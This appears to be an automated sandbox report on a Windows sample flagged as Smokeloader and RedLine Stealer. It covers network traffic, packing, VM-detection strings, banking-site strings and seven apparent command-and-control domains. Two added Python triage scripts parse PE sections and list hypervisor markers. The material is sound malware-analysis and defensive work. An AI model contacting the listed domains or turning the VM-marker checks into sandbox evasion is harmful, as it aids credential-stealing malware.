Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49749 version: TLS 1.2

            System Summary

            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000000.00000002.2339254428.0000000000802000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 1900
            Source: Bootstrapper.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000000.00000002.2339254428.0000000000802000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: Bootstrapper.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1036
            Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\070acd59-ccd5-45ca-8ada-4060a2513ea1
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Bootstrapper.exe, 00000000.00000003.2221895378.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2233966360.0000000002F2E000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2234096872.0000000002F22000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2221433741.0000000002F30000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Bootstrapper.exe | Virustotal: Detection: 50%
            Source: Bootstrapper.exe | ReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\Bootstrapper.exe | File read: C:\Users\user\Desktop\Bootstrapper.exe
            Source: unknown | Process created: C:\Users\user\Desktop\Bootstrapper.exe "C:\Users\user\Desktop\Bootstrapper.exe"
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: msimg32.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: msvcr100.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: webio.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

            Data Obfuscation

            Source: C:\Users\user\Desktop\Bootstrapper.exe | Unpacked PE file: 0.2.Bootstrapper.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.joli:W;.yoli:W;.hozuvup:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Unpacked PE file: 0.2.Bootstrapper.exe.400000.0.unpack
            Source: Bootstrapper.exe | Static PE information: section name: .joli
            Source: Bootstrapper.exe | Static PE information: section name: .yoli
            Source: Bootstrapper.exe | Static PE information: section name: .hozuvup
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Code function: 0_3_02F06876 push edi; retf 0_3_02F06879
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Code function: 0_3_02F06A94 push ecx; ret 0_3_02F06A9A
            Source: Bootstrapper.exe | Static PE information: section name: .text entropy: 7.412788530968616
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
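Added example, not part of the sandbox report and not the sample's code: a stand-alone Python triage script that parses a PE section table and reproduces the static findings above on its own, the non-standard section names (.joli, .yoli, .hozuvup), a high-entropy executable .text (7.41 in this sample), and the changed section layout between the on-disk file and the dumped image that the "Unpacked PE file ... vs ..." line reports. The PE it parses is constructed inside the script with this sample's section names; the section contents are filler, not bytes from Bootstrapper.exe. Note that the report abbreviates .data as W while this script prints every right that is set (.data:RW).

```python
import hashlib
import math
import struct

# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h).
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE = 0x00000020, 0x20000000
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x40000000, 0x80000000
# Names a normally linked image uses; anything else is flagged, as the report does.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".tls", ".bss", ".CRT"}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def rights(chars: int) -> str:
    """E/R/W letters in the order the report prints them (.text:ER)."""
    flags = (("E", IMAGE_SCN_MEM_EXECUTE), ("R", IMAGE_SCN_MEM_READ), ("W", IMAGE_SCN_MEM_WRITE))
    return "".join(letter for letter, bit in flags if chars & bit)

def parse_sections(pe: bytes) -> list:
    """DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    out = []
    for i in range(n_sections):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        out.append({"name": name, "rights": rights(chars),
                    "entropy": round(shannon_entropy(pe[raw_ptr:raw_ptr + raw_size]), 2)})
    return out

def rights_layout(sections: list) -> str:
    """Same shape as the report's '.text:ER;.rdata:R;...' string."""
    return "".join(f"{s['name']}:{s['rights']};" for s in sections)

def layout_changed(on_disk: list, in_memory: list) -> bool:
    """'Detected unpacking (changes PE section rights)': dump layout differs from the file's."""
    return rights_layout(on_disk) != rights_layout(in_memory)

def triage(sections: list, entropy_threshold: float = 7.0) -> list:
    """The static findings the report lists: odd names, packed-looking code, W+X."""
    findings = []
    for s in sections:
        if s["name"] not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {s['name']}")
        if "E" in s["rights"] and s["entropy"] >= entropy_threshold:
            findings.append(f"high entropy in executable section {s['name']}: {s['entropy']}")
        if "E" in s["rights"] and "W" in s["rights"]:
            findings.append(f"writable and executable section: {s['name']}")
    return findings

def build_pe(layout: list) -> bytes:
    """Constructed minimal PE32 (headers + section table + raw data; not loadable)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 224, 0x0103)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    raw_ptr = 0x40 + 4 + 20 + 224 + 40 * len(layout)
    table, raw = bytearray(), bytearray()
    for idx, (name, chars, data) in enumerate(layout):
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), 0x1000 * (idx + 1),
                             len(data), raw_ptr, 0, 0, 0, 0, chars)
        raw += data
        raw_ptr += len(data)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table) + bytes(raw)

def _filler(n: int) -> bytes:
    """Deterministic high-entropy bytes standing in for packed code (constructed)."""
    return b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(n // 32 + 1))[:n]

CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
# Section lists follow the report's packed-vs-unpacked line; the contents are constructed.
PACKED = [(".text", CODE, _filler(4096)), (".rdata", IMAGE_SCN_MEM_READ, b"const\0" * 64),
          (".data", RW, b"\0" * 256), (".joli", IMAGE_SCN_MEM_WRITE, b"\0" * 256),
          (".yoli", IMAGE_SCN_MEM_WRITE, b"\0" * 256), (".hozuvup", IMAGE_SCN_MEM_READ, b"\0" * 256),
          (".rsrc", IMAGE_SCN_MEM_READ, b"\0" * 256)]
UNPACKED = [(".text", CODE, b"\x55\x8b\xec\x83\xec\x10\x5d\xc3" * 512),
            (".rdata", IMAGE_SCN_MEM_READ, b"const\0" * 64), (".data", RW, b"\0" * 256),
            (".reloc", IMAGE_SCN_MEM_READ, b"\0" * 256)]
```

On a real case, feed `parse_sections()` the file from disk and the image dumped from 0x400000 after the sample has unpacked itself; `layout_changed()` then gives the same verdict as the "Unpacked PE file ... vs ..." line. The 7.0 entropy threshold is a heuristic: compressed resources and embedded certificates push .rsrc above it too, which is why the script only weighs executable sections.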

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Bootstrapper.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Bootstrapper.exe | System information queried: FirmwareTableInformation
            Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 4976 | Thread sleep time: -180000s >= -30000s
            Source: C:\Users\user\Desktop\Bootstrapper.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: Amcache.hve.4.dr | Binary or memory string: VMware
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
            Source: Bootstrapper.exe, 00000000.00000002.2339295599.0000000000849000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
            Source: Amcache.hve.4.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: Bootstrapper.exe, 00000000.00000003.2278052852.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2267056339.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2289039973.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266368056.0000000000876000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: Amcache.hve.4.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,116
            Source: Bootstrapper.exe, 00000000.00000003.2233342276.0000000002F47000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: Amcache.hve.4.dr | Binary or memory string: vmci.sys
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1
            Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.4.dr | Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.4.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.4.dr | Binary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.4.dr | Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.4.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.4.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin
            Source: Amcache.hve.4.dr | Binary or memory string: VMware, Inc.
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.4.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.4.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.4.dr | Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
            Source: Amcache.hve.4.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F55000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
            Source: Amcache.hve.4.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.4.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.4.dr | Binary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.4.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: Amcache.hve.4.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Process information queried: ProcessInformation
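Added example, not the report's or the sample's code: a Python script that parses the Amcache SMBIOS summary line above (its values contain commas, "VMware, Inc." and "VMware20,1", so a plain split on commas breaks it) and lists which hypervisor markers a guest can see through the three channels this sample used: the firmware table, the Win32_BIOS and Win32_VideoController WMI classes, and device or driver names. The WMI rows are constructed stand-ins with values taken from the report's strings; the video adapter name is an assumption, since the report does not print it.

```python
import re

# Copied from the report's Amcache.hve entry: the SMBIOS summary that the sample's
# firmware-table query and its Win32_BIOS query both draw on.
AMCACHE_SMBIOS = ("BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,"
                  "BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,"
                  "SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,"
                  "SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,"
                  "BaseboardVersion:,EnclosureType:0x1")

# Constructed rows shaped like the WMI classes the sample queried; values come from
# the report's strings except the video adapter name, which is assumed.
WMI_ROWS = {
    "Win32_BIOS": {"Manufacturer": "VMware, Inc.",
                   "SMBIOSBIOSVersion": "VMW201.00V.20829224.B64.2211211842",
                   "SerialNumber": "VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20"},
    "Win32_VideoController": {"Name": "VMware SVGA 3D", "AdapterCompatibility": "VMware, Inc."},
    "Win32_BaseBoard": {"Manufacturer": "", "Product": ""},
}
# Device and driver names the report pulled from the same Amcache hive.
DEVICE_STRINGS = ["Microsoft Hyper-V Generation Counter", "VMware Virtual disk SCSI Disk Device",
                  "NECVMWar VMware SATA CD00", "VMware PCI VMCI Bus Device", "vmci.sys"]

# Case-insensitive substrings that give a hypervisor away; extend per lab image.
MARKERS = {
    "VMware": ("vmware", "vmw20", "necvmwar", "vmci"),
    "Hyper-V": ("hyper-v", "virtual machine", "msvm"),
    "VirtualBox": ("virtualbox", "vbox", "innotek"),
    "QEMU/KVM": ("qemu", "bochs", "kvm"),
}
# VMware BIOS serials are 'VMware-' plus 16 hex bytes split 8/8 by a dash, as in the report.
VMWARE_SERIAL = re.compile(r"^VMware-(?:[0-9a-f]{2} ){7}[0-9a-f]{2}-(?:[0-9a-f]{2} ){7}[0-9a-f]{2}$")

def parse_amcache_smbios(line: str) -> dict:
    """Split 'Key:Value,Key:Value' where values may themselves contain commas
    ('VMware, Inc.', 'VMware20,1'): only split at a comma that starts a new key."""
    fields = {}
    for part in re.split(r",(?=[A-Za-z]+:)", line):
        key, _, value = part.partition(":")
        fields[key] = value
    return fields

def hypervisor_hits(values) -> dict:
    """hypervisor -> sorted list of the strings that betrayed it."""
    hits = {}
    for v in values:
        low = v.lower()
        for hv, needles in MARKERS.items():
            if any(n in low for n in needles):
                hits.setdefault(hv, set()).add(v)
    return {hv: sorted(s) for hv, s in hits.items()}

def sandbox_exposure(smbios_line: str, wmi_rows: dict, device_strings: list) -> dict:
    """Everything a guest can learn through the channels this sample used:
    the firmware table, WMI hardware classes, and device/driver names."""
    values = list(parse_amcache_smbios(smbios_line).values()) + list(device_strings)
    for row in wmi_rows.values():
        values.extend(row.values())
    exposure = hypervisor_hits(v for v in values if v)
    serial = wmi_rows.get("Win32_BIOS", {}).get("SerialNumber", "")
    if VMWARE_SERIAL.match(serial):
        exposure.setdefault("VMware", []).append("serial number format: " + serial)
    return exposure
```

Run the same check against your own analysis image: whatever it returns is what the sample's Win32_BIOS, Win32_VideoController and firmware-table queries would have returned, and the fix belongs on the hypervisor side (custom SMBIOS strings, renamed virtual devices), not in the guest.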

            HIPS / PFW / Operating System Protection Evasion

            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: finickypwk.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: shoefeatthe.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: savorraiykj.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: kickykiduz.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: miniatureyu.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: leggelatez.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: washyceehsu.lat
